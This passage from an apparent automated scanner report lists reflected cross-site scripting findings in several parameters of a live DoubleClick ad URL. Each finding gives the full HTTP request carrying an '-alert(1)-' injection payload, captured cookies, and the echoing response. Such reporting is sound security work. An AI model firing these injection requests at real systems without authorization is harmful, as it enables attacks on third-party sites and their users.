Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:47 GMT
Content-Length: 9311

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVN%26%26cid%3DGENRET%3B877237%3B62579858%3B239944212%3B39988944");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

6.60. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64a83"-alert(1)-"d897ed4d1c2 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:46 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=8034064a83"-alert(1)-"d897ed4d1c2&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.61. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60583"-alert(1)-"42928ca0e0e was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:56 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=11078160583"-alert(1)-"42928ca0e0e&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.62. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ec41"-alert(1)-"31c5ba5de38 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:25 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=93ec41"-alert(1)-"31c5ba5de38&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.63. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edfc6"-alert(1)-"fc5c4421cff was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:16 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.64. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17651"-alert(1)-"3f123fd8fd4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:06 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.65. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383aa"-alert(1)-"6682829cf01 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:36 GMT
Content-Length: 9308

